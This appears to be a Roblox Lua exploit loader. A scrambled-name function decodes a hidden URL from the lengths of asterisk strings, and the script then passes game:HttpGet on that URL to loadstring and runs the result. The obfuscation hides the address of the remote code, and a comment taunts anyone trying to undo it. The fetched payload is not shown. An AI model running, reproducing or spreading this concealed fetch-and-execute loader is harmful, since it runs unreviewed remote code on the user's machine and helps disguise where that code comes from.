-- trying to bypass my obfuscation? nice try.
function yiXkVdKagwomeDAAAyTHzUOWGirVCIsvUMKLwwlHwuONBpXQJmwoxTrNOGzymlehgEzlQOUEWzwmkdMuWfhtDccTqLwWsTh(c)
tab={}
for i = 1,#c do
x=string.len(c[i]) 
y=string.char(x)
table.insert(tab,y)
end
x=table.concat(tab)
return x
end 


loadstring(game:HttpGet(yiXkVdKagwomeDAAAyTHzUOWGirVCIsvUMKLwwlHwuONBpXQJmwoxTrNOGzymlehgEzlQOUEWzwmkdMuWfhtDccTqLwWsTh({'********************************************************************************************************','********************************************************************************************************************','********************************************************************************************************************','****************************************************************************************************************','*******************************************************************************************************************','**********************************************************','***********************************************','***********************************************','*************************************************************************************************','**********************************************************************************************************************','*************************************************************************************************','*******************************************************************************************************************','***************************************************************************************************','******************************************************************************************************************','*********************************************************************************************************','****************************************************************************************************************','********************************************************************************************************************','*********************************************************************************************************','**************************************************************************************************************','*******************************************************************************************************','**********************************************','************************************************','************************************************','************************************************','***********************************************************************************************************************','*****************************************************************************************************','**************************************************************************************************','********************************************************************************************************','***************************************************************************************************************','*******************************************************************************************************************','********************************************************************************************************************','*************************************************************************************************','****************************************************************************************************************','****************************************************************************************************************','**********************************************','***************************************************************************************************','***************************************************************************************************************','*************************************************************************************************************','***********************************************','******************************************************************************','***************************************************************************************************************','********************************************************************************************************************','********************************************************************************************************','*********************************************************************************************************','**************************************************************************************************************','*******************************************************************************************************','********************************************************************************************************************','******************************************************************************************************************','*********************************************************************************************************************','*****************************************************************************************************','**********************************************','********************************************************************************************************************','************************************************************************************************************************','********************************************************************************************************************'})))()    
